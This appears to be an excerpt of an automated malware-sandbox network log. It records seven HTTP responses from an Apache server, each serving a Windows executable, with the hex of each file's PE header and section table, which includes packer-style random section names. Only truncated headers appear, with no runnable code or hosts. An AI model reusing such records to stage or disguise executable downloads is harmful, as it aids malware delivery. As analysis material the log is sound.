00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 01 Mar 2025 15:26:36 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sat, 01 Mar 2025 15:00:50 GMTETag: "310600-62f4930517c6a"Accept-Ranges: bytesContent-Length: 3212800Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 1d 1b bb 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 74 04 00 00 ae 00 00 00 00 00 00 00 10 31 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 31 00 00 04 00 00 72 05 32 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 b0 05 00 6b 00 00 00 00 a0 05 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 05 00 00 10 00 00 00 90 05 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 a0 05 00 00 02 00 00 00 a0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 05 00 00 02 00 00 00 a2 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 64 6e 63 63 77 76 74 62 00 40 2b 00 00 c0 05 00 00 3a 2b 00 00 a4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 65 63 6e 6a 68 79 79 00 10 00 00 00 00 31 00 00 06 00 00 00 de 30 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 10 31 00 00 22 00 00 00 e4 30 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 01 Mar 2025 15:26:44 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sat, 01 Mar 2025 15:02:28 GMTETag: "1cf600-62f49362c1f1e"Accept-Ranges: bytesContent-Length: 1897984Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 1d 1b bb 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 74 04 00 00 b0 00 00 00 00 00 00 00 d0 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 4b 00 00 04 00 00 13 f7 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 b0 05 00 6b 00 00 00 00 a0 05 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 05 00 00 10 00 00 00 9a 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 88 03 00 00 00 a0 05 00 00 04 00 00 00 aa 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 05 00 00 02 00 00 00 ae 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 2a 00 00 c0 05 00 00 02 00 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 69 61 74 67 66 67 6a 00 20 1a 00 00 a0 30 00 00 1e 1a 00 00 b2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 77 77 79 6d 62 63 6f 00 10 00 00 00 c0 4a 00 00 04 00 00 00 d0 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 4a 00 00 22 00 00 00 d4 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 01 Mar 2025 15:26:51 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sat, 01 Mar 2025 15:23:00 GMTETag: "47d600-62f497fa124d0"Accept-Ranges: bytesContent-Length: 4707840Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 00 00 00 00 00 8a 6d 00 00 00 00 00 e0 00 02 03 0b 01 03 00 00 d8 34 00 00 ba 39 00 00 00 00 00 00 20 c3 00 00 10 00 00 00 70 67 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 50 c3 00 00 04 00 00 c1 f7 47 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 d0 71 00 68 00 00 00 00 c0 70 00 bc 0a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 71 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 70 00 00 10 00 00 00 52 2b 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 bc 0a 01 00 00 c0 70 00 00 20 00 00 00 62 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 d0 71 00 00 02 00 00 00 82 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 35 00 00 e0 71 00 00 02 00 00 00 84 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 64 6d 65 66 62 77 66 00 30 1c 00 00 e0 a6 00 00 2a 1c 00 00 86 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 7a 73 6c 77 63 64 6c 00 10 00 00 00 10 c3 00 00 04 00 00 00 b0 47 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 20 c3 00 00 22 00 00 00 b4 47 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 01 Mar 2025 15:27:00 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sat, 01 Mar 2025 15:20:21 GMTETag: "3c3a00-62f497622938c"Accept-Ranges: bytesContent-Length: 3947008Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 00 00 00 00 00 70 4d 00 00 00 00 00 e0 00 02 03 0b 01 03 00 00 0e 25 00 00 6a 29 00 00 00 00 00 00 b0 a1 00 00 10 00 00 00 50 48 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 e0 a1 00 00 04 00 00 f6 00 3d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 90 53 00 68 00 00 00 00 80 52 00 bc 0a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 91 53 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 52 00 00 10 00 00 00 ea 1f 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 bc 0a 01 00 00 80 52 00 00 20 00 00 00 fa 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 53 00 00 02 00 00 00 1a 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 32 00 00 a0 53 00 00 02 00 00 00 1c 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 6b 76 65 75 69 75 62 00 00 1c 00 00 a0 85 00 00 f4 1b 00 00 1e 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 66 68 74 71 71 64 6a 00 10 00 00 00 a0 a1 00 00 06 00 00 00 12 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 a1 00 00 22 00 00 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 01 Mar 2025 15:27:09 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sat, 01 Mar 2025 14:49:43 GMTETag: "314800-62f4908926670"Accept-Ranges: bytesContent-Length: 3229696Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 53 c9 c0 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 f0 04 00 00 b4 00 00 00 00 00 00 00 50 31 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 31 00 00 04 00 00 2d 5f 31 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 20 06 00 6b 00 00 00 00 10 06 00 fc 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 21 06 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 00 06 00 00 10 00 00 00 00 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 fc 02 00 00 00 10 06 00 00 02 00 00 00 10 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 20 06 00 00 02 00 00 00 12 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 75 74 70 76 74 70 66 79 00 10 2b 00 00 30 06 00 00 0e 2b 00 00 14 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 72 67 6b 6e 61 71 79 00 10 00 00 00 40 31 00 00 04 00 00 00 22 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 31 00 00 22 00 00 00 26 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 01 Mar 2025 15:27:17 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sat, 01 Mar 2025 14:50:11 GMTETag: "1b6400-62f490a484298"Accept-Ranges: bytesContent-Length: 1795072Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 40 3d c2 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 f0 68 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 69 00 00 04 00 00 23 cb 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 8c 03 00 00 00 a0 24 00 00 04 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 60 2a 00 00 c0 24 00 00 02 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 61 70 7a 63 6b 64 76 00 c0 19 00 00 20 4f 00 00 be 19 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 6a 78 78 76 77 66 76 00 10 00 00 00 e0 68 00 00 04 00 00 00 3e 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 f0 68 00 00 22 00 00 00 42 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 01 Mar 2025 15:27:24 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sat, 01 Mar 2025 14:48:48 GMTETag: "ecc00-62f490553e814"Accept-Ranges: bytesContent-Length: 969728Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 33 1e c3 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 1c 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 0f 00 00 04 00 00 b5 97 0f 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 d8 60 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 0e 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d8 60 01 00 00 40 0d 00 00 62 01 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 b0 0e 00 00 76 00 00 00 56 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 